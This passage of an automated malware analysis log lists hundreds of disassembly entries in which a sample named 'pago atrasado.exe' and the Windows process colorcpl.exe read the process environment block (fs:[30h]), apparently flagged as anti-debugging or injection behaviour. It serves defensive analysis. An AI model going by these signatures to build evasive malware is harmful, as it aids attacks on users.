          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A7FEC0 mov eax, dword ptr fs:[00000030h]1_2_00A7FEC0
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A08EC7 mov eax, dword ptr fs:[00000030h]1_2_00A08EC7
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F16E0 mov ecx, dword ptr fs:[00000030h]1_2_009F16E0
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A98ED6 mov eax, dword ptr fs:[00000030h]1_2_00A98ED6
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009D76E2 mov eax, dword ptr fs:[00000030h]1_2_009D76E2
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009FA61C mov eax, dword ptr fs:[00000030h]1_2_009FA61C
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009FA61C mov eax, dword ptr fs:[00000030h]1_2_009FA61C
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A7FE3F mov eax, dword ptr fs:[00000030h]1_2_00A7FE3F
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009CC600 mov eax, dword ptr fs:[00000030h]1_2_009CC600
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009CC600 mov eax, dword ptr fs:[00000030h]1_2_009CC600
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009CC600 mov eax, dword ptr fs:[00000030h]1_2_009CC600
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F8E00 mov eax, dword ptr fs:[00000030h]1_2_009F8E00
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A81608 mov eax, dword ptr fs:[00000030h]1_2_00A81608
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009CE620 mov eax, dword ptr fs:[00000030h]1_2_009CE620
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009D7E41 mov eax, dword ptr fs:[00000030h]1_2_009D7E41
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009D7E41 mov eax, dword ptr fs:[00000030h]1_2_009D7E41
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009D7E41 mov eax, dword ptr fs:[00000030h]1_2_009D7E41
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009D7E41 mov eax, dword ptr fs:[00000030h]1_2_009D7E41
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009D7E41 mov eax, dword ptr fs:[00000030h]1_2_009D7E41
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009D7E41 mov eax, dword ptr fs:[00000030h]1_2_009D7E41
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A8AE44 mov eax, dword ptr fs:[00000030h]1_2_00A8AE44
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A8AE44 mov eax, dword ptr fs:[00000030h]1_2_00A8AE44
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009EAE73 mov eax, dword ptr fs:[00000030h]1_2_009EAE73
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009EAE73 mov eax, dword ptr fs:[00000030h]1_2_009EAE73
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009EAE73 mov eax, dword ptr fs:[00000030h]1_2_009EAE73
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009EAE73 mov eax, dword ptr fs:[00000030h]1_2_009EAE73
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009EAE73 mov eax, dword ptr fs:[00000030h]1_2_009EAE73
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009D766D mov eax, dword ptr fs:[00000030h]1_2_009D766D
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009D8794 mov eax, dword ptr fs:[00000030h]1_2_009D8794
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A47794 mov eax, dword ptr fs:[00000030h]1_2_00A47794
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A47794 mov eax, dword ptr fs:[00000030h]1_2_00A47794
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A47794 mov eax, dword ptr fs:[00000030h]1_2_00A47794
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A037F5 mov eax, dword ptr fs:[00000030h]1_2_00A037F5
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009EF716 mov eax, dword ptr fs:[00000030h]1_2_009EF716
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009FA70E mov eax, dword ptr fs:[00000030h]1_2_009FA70E
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009FA70E mov eax, dword ptr fs:[00000030h]1_2_009FA70E
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A9070D mov eax, dword ptr fs:[00000030h]1_2_00A9070D
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A9070D mov eax, dword ptr fs:[00000030h]1_2_00A9070D
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009FE730 mov eax, dword ptr fs:[00000030h]1_2_009FE730
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009C4F2E mov eax, dword ptr fs:[00000030h]1_2_009C4F2E
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009C4F2E mov eax, dword ptr fs:[00000030h]1_2_009C4F2E
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A5FF10 mov eax, dword ptr fs:[00000030h]1_2_00A5FF10
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A5FF10 mov eax, dword ptr fs:[00000030h]1_2_00A5FF10
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A98F6A mov eax, dword ptr fs:[00000030h]1_2_00A98F6A
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009DEF40 mov eax, dword ptr fs:[00000030h]1_2_009DEF40
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009DFF60 mov eax, dword ptr fs:[00000030h]1_2_009DFF60
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04550050 mov eax, dword ptr fs:[00000030h]16_2_04550050
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04550050 mov eax, dword ptr fs:[00000030h]16_2_04550050
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045CC450 mov eax, dword ptr fs:[00000030h]16_2_045CC450
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045CC450 mov eax, dword ptr fs:[00000030h]16_2_045CC450
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04601074 mov eax, dword ptr fs:[00000030h]16_2_04601074
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0456A44B mov eax, dword ptr fs:[00000030h]16_2_0456A44B
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045F2073 mov eax, dword ptr fs:[00000030h]16_2_045F2073
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0455746D mov eax, dword ptr fs:[00000030h]16_2_0455746D
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045B7016 mov eax, dword ptr fs:[00000030h]16_2_045B7016
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045B7016 mov eax, dword ptr fs:[00000030h]16_2_045B7016
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045B7016 mov eax, dword ptr fs:[00000030h]16_2_045B7016
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045B6C0A mov eax, dword ptr fs:[00000030h]16_2_045B6C0A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045B6C0A mov eax, dword ptr fs:[00000030h]16_2_045B6C0A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045B6C0A mov eax, dword ptr fs:[00000030h]16_2_045B6C0A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045B6C0A mov eax, dword ptr fs:[00000030h]16_2_045B6C0A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045F1C06 mov eax, dword ptr fs:[00000030h]16_2_045F1C06
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045F1C06 mov eax, dword ptr fs:[00000030h]16_2_045F1C06
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045F1C06 mov eax, dword ptr fs:[00000030h]16_2_045F1C06
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045F1C06 mov eax, dword ptr fs:[00000030h]16_2_045F1C06
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045F1C06 mov eax, dword ptr fs:[00000030h]16_2_045F1C06
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045F1C06 mov eax, dword ptr fs:[00000030h]16_2_045F1C06
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045F1C06 mov eax, dword ptr fs:[00000030h]16_2_045F1C06
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045F1C06 mov eax, dword ptr fs:[00000030h]16_2_045F1C06
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045F1C06 mov eax, dword ptr fs:[00000030h]16_2_045F1C06
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045F1C06 mov eax, dword ptr fs:[00000030h]16_2_045F1C06
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045F1C06 mov eax, dword ptr fs:[00000030h]16_2_045F1C06
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045F1C06 mov eax, dword ptr fs:[00000030h]16_2_045F1C06
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045F1C06 mov eax, dword ptr fs:[00000030h]16_2_045F1C06
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045F1C06 mov eax, dword ptr fs:[00000030h]16_2_045F1C06
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0460740D mov eax, dword ptr fs:[00000030h]16_2_0460740D
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0460740D mov eax, dword ptr fs:[00000030h]16_2_0460740D
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0460740D mov eax, dword ptr fs:[00000030h]16_2_0460740D
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04604015 mov eax, dword ptr fs:[00000030h]16_2_04604015
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04604015 mov eax, dword ptr fs:[00000030h]16_2_04604015
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0456BC2C mov eax, dword ptr fs:[00000030h]16_2_0456BC2C
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0456002D mov eax, dword ptr fs:[00000030h]16_2_0456002D
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0456002D mov eax, dword ptr fs:[00000030h]16_2_0456002D
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0456002D mov eax, dword ptr fs:[00000030h]16_2_0456002D
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0456002D mov eax, dword ptr fs:[00000030h]16_2_0456002D
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0456002D mov eax, dword ptr fs:[00000030h]16_2_0456002D
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0454B02A mov eax, dword ptr fs:[00000030h]16_2_0454B02A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0454B02A mov eax, dword ptr fs:[00000030h]16_2_0454B02A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0454B02A mov eax, dword ptr fs:[00000030h]16_2_0454B02A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0454B02A mov eax, dword ptr fs:[00000030h]16_2_0454B02A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045CB8D0 mov eax, dword ptr fs:[00000030h]16_2_045CB8D0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045CB8D0 mov ecx, dword ptr fs:[00000030h]16_2_045CB8D0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045CB8D0 mov eax, dword ptr fs:[00000030h]16_2_045CB8D0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045CB8D0 mov eax, dword ptr fs:[00000030h]16_2_045CB8D0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045CB8D0 mov eax, dword ptr fs:[00000030h]16_2_045CB8D0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045CB8D0 mov eax, dword ptr fs:[00000030h]16_2_045CB8D0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045F14FB mov eax, dword ptr fs:[00000030h]16_2_045F14FB
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045B6CF0 mov eax, dword ptr fs:[00000030h]16_2_045B6CF0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045B6CF0 mov eax, dword ptr fs:[00000030h]16_2_045B6CF0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045B6CF0 mov eax, dword ptr fs:[00000030h]16_2_045B6CF0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04608CD6 mov eax, dword ptr fs:[00000030h]16_2_04608CD6
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045358EC mov eax, dword ptr fs:[00000030h]16_2_045358EC
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0454849B mov eax, dword ptr fs:[00000030h]16_2_0454849B
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04539080 mov eax, dword ptr fs:[00000030h]16_2_04539080
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045B3884 mov eax, dword ptr fs:[00000030h]16_2_045B3884
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045B3884 mov eax, dword ptr fs:[00000030h]16_2_045B3884
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0456F0BF mov ecx, dword ptr fs:[00000030h]16_2_0456F0BF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0456F0BF mov eax, dword ptr fs:[00000030h]16_2_0456F0BF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0456F0BF mov eax, dword ptr fs:[00000030h]16_2_0456F0BF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045620A0 mov eax, dword ptr fs:[00000030h]16_2_045620A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045620A0 mov eax, dword ptr fs:[00000030h]16_2_045620A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045620A0 mov eax, dword ptr fs:[00000030h]16_2_045620A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045620A0 mov eax, dword ptr fs:[00000030h]16_2_045620A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045620A0 mov eax, dword ptr fs:[00000030h]16_2_045620A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045620A0 mov eax, dword ptr fs:[00000030h]16_2_045620A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045790AF mov eax, dword ptr fs:[00000030h]16_2_045790AF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04557D50 mov eax, dword ptr fs:[00000030h]16_2_04557D50
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0455B944 mov eax, dword ptr fs:[00000030h]16_2_0455B944
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0455B944 mov eax, dword ptr fs:[00000030h]16_2_0455B944
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04573D43 mov eax, dword ptr fs:[00000030h]16_2_04573D43
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045B3540 mov eax, dword ptr fs:[00000030h]16_2_045B3540
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0453B171 mov eax, dword ptr fs:[00000030h]16_2_0453B171
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0453B171 mov eax, dword ptr fs:[00000030h]16_2_0453B171
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0455C577 mov eax, dword ptr fs:[00000030h]16_2_0455C577
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0455C577 mov eax, dword ptr fs:[00000030h]16_2_0455C577
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0453C962 mov eax, dword ptr fs:[00000030h]16_2_0453C962
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04539100 mov eax, dword ptr fs:[00000030h]16_2_04539100
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04539100 mov eax, dword ptr fs:[00000030h]16_2_04539100
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04539100 mov eax, dword ptr fs:[00000030h]16_2_04539100
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04608D34 mov eax, dword ptr fs:[00000030h]16_2_04608D34
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04543D34 mov eax, dword ptr fs:[00000030h]16_2_04543D34
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04543D34 mov eax, dword ptr fs:[00000030h]16_2_04543D34
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04543D34 mov eax, dword ptr fs:[00000030h]16_2_04543D34
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04543D34 mov eax, dword ptr fs:[00000030h]16_2_04543D34
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04543D34 mov eax, dword ptr fs:[00000030h]16_2_04543D34
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04543D34 mov eax, dword ptr fs:[00000030h]16_2_04543D34
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04543D34 mov eax, dword ptr fs:[00000030h]16_2_04543D34
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04543D34 mov eax, dword ptr fs:[00000030h]16_2_04543D34
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04543D34 mov eax, dword ptr fs:[00000030h]16_2_04543D34
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04543D34 mov eax, dword ptr fs:[00000030h]16_2_04543D34
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04543D34 mov eax, dword ptr fs:[00000030h]16_2_04543D34
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04543D34 mov eax, dword ptr fs:[00000030h]16_2_04543D34
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04543D34 mov eax, dword ptr fs:[00000030h]16_2_04543D34
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0453AD30 mov eax, dword ptr fs:[00000030h]16_2_0453AD30
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0456513A mov eax, dword ptr fs:[00000030h]16_2_0456513A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0456513A mov eax, dword ptr fs:[00000030h]16_2_0456513A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045BA537 mov eax, dword ptr fs:[00000030h]16_2_045BA537
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04564D3B mov eax, dword ptr fs:[00000030h]16_2_04564D3B
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04564D3B mov eax, dword ptr fs:[00000030h]16_2_04564D3B
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04564D3B mov eax, dword ptr fs:[00000030h]16_2_04564D3B
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04554120 mov eax, dword ptr fs:[00000030h]16_2_04554120
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04554120 mov eax, dword ptr fs:[00000030h]16_2_04554120
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04554120 mov eax, dword ptr fs:[00000030h]16_2_04554120
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04554120 mov eax, dword ptr fs:[00000030h]16_2_04554120
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04554120 mov ecx, dword ptr fs:[00000030h]16_2_04554120
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045E8DF1 mov eax, dword ptr fs:[00000030h]16_2_045E8DF1
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0453B1E1 mov eax, dword ptr fs:[00000030h]16_2_0453B1E1
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0453B1E1 mov eax, dword ptr fs:[00000030h]16_2_0453B1E1
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0453B1E1 mov eax, dword ptr fs:[00000030h]16_2_0453B1E1
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045C41E8 mov eax, dword ptr fs:[00000030h]16_2_045C41E8
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0454D5E0 mov eax, dword ptr fs:[00000030h]16_2_0454D5E0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0454D5E0 mov eax, dword ptr fs:[00000030h]16_2_0454D5E0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04562990 mov eax, dword ptr fs:[00000030h]16_2_04562990
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0456FD9B mov eax, dword ptr fs:[00000030h]16_2_0456FD9B
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0456FD9B mov eax, dword ptr fs:[00000030h]16_2_0456FD9B
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0456A185 mov eax, dword ptr fs:[00000030h]16_2_0456A185
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0455C182 mov eax, dword ptr fs:[00000030h]16_2_0455C182
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04562581 mov eax, dword ptr fs:[00000030h]16_2_04562581
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04562581 mov eax, dword ptr fs:[00000030h]16_2_04562581
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04562581 mov eax, dword ptr fs:[00000030h]16_2_04562581
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04562581 mov eax, dword ptr fs:[00000030h]16_2_04562581
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04532D8A mov eax, dword ptr fs:[00000030h]16_2_04532D8A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04532D8A mov eax, dword ptr fs:[00000030h]16_2_04532D8A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04532D8A mov eax, dword ptr fs:[00000030h]16_2_04532D8A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04532D8A mov eax, dword ptr fs:[00000030h]16_2_04532D8A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04532D8A mov eax, dword ptr fs:[00000030h]16_2_04532D8A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04561DB5 mov eax, dword ptr fs:[00000030h]16_2_04561DB5
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04561DB5 mov eax, dword ptr fs:[00000030h]16_2_04561DB5
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04561DB5 mov eax, dword ptr fs:[00000030h]16_2_04561DB5
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045B51BE mov eax, dword ptr fs:[00000030h]16_2_045B51BE
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045B51BE mov eax, dword ptr fs:[00000030h]16_2_045B51BE
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045B51BE mov eax, dword ptr fs:[00000030h]16_2_045B51BE
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045B51BE mov eax, dword ptr fs:[00000030h]16_2_045B51BE
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045661A0 mov eax, dword ptr fs:[00000030h]16_2_045661A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045661A0 mov eax, dword ptr fs:[00000030h]16_2_045661A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045635A1 mov eax, dword ptr fs:[00000030h]16_2_045635A1
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045B69A6 mov eax, dword ptr fs:[00000030h]16_2_045B69A6
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04608A62 mov eax, dword ptr fs:[00000030h]16_2_04608A62
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045C4257 mov eax, dword ptr fs:[00000030h]16_2_045C4257
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04539240 mov eax, dword ptr fs:[00000030h]16_2_04539240
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04539240 mov eax, dword ptr fs:[00000030h]16_2_04539240
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04539240 mov eax, dword ptr fs:[00000030h]16_2_04539240
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04539240 mov eax, dword ptr fs:[00000030h]16_2_04539240
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04547E41 mov eax, dword ptr fs:[00000030h]16_2_04547E41
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04547E41 mov eax, dword ptr fs:[00000030h]16_2_04547E41
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04547E41 mov eax, dword ptr fs:[00000030h]16_2_04547E41
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04547E41 mov eax, dword ptr fs:[00000030h]16_2_04547E41
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04547E41 mov eax, dword ptr fs:[00000030h]16_2_04547E41
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04547E41 mov eax, dword ptr fs:[00000030h]16_2_04547E41
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0455AE73 mov eax, dword ptr fs:[00000030h]16_2_0455AE73
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0455AE73 mov eax, dword ptr fs:[00000030h]16_2_0455AE73
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0455AE73 mov eax, dword ptr fs:[00000030h]16_2_0455AE73
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0455AE73 mov eax, dword ptr fs:[00000030h]16_2_0455AE73
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0455AE73 mov eax, dword ptr fs:[00000030h]16_2_0455AE73
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0457927A mov eax, dword ptr fs:[00000030h]16_2_0457927A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0454766D mov eax, dword ptr fs:[00000030h]16_2_0454766D
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045EB260 mov eax, dword ptr fs:[00000030h]16_2_045EB260
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045EB260 mov eax, dword ptr fs:[00000030h]16_2_045EB260
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0453AA16 mov eax, dword ptr fs:[00000030h]16_2_0453AA16
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0453AA16 mov eax, dword ptr fs:[00000030h]16_2_0453AA16
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04553A1C mov eax, dword ptr fs:[00000030h]16_2_04553A1C
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0456A61C mov eax, dword ptr fs:[00000030h]16_2_0456A61C
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0456A61C mov eax, dword ptr fs:[00000030h]16_2_0456A61C
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0453C600 mov eax, dword ptr fs:[00000030h]16_2_0453C600
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0453C600 mov eax, dword ptr fs:[00000030h]16_2_0453C600
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0453C600 mov eax, dword ptr fs:[00000030h]16_2_0453C600
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04568E00 mov eax, dword ptr fs:[00000030h]16_2_04568E00
